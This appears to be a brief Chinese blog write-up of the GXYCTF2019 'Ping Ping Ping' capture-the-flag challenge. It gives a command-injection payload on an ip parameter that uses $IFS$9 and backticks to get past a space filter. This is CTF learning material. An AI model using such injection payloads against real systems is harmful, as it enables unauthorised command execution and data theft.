原创CTF复现 ping

[GXYCTF2019] Ping Ping Ping

发表于2025-02-13更新于2025-02-14

阅读量: 河北

[GXYCTF2019] Ping Ping Ping

ZhEYuAN2025-02-132025-02-14

说实话我觉得这篇博客写的非常详细了（已存本地

CTFWeb-命令执行漏洞过滤的绕过姿势_绕过空格过滤-CSDN博客

个人思路的缺失为，发现对url有过多的过滤后，没有转变思路想到去index.php中查看源代码

payload：?ip=127.0.0.1;tac$IFS$9ls;

(反引号括住ls，表示把ls命令执行的结果作为参数传入前一个命令)

$IFS$9：代替空格

ZhEYuAN

能随时睡觉是一种幸福

原创 [GXYCTF2019] Ping Ping Ping

打赏作者

感谢你赐予我前进的力量

微信
支付宝

赞赏者名单

因为你们的支持让我意识到写文章的价值🙏

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ZhEYuAN！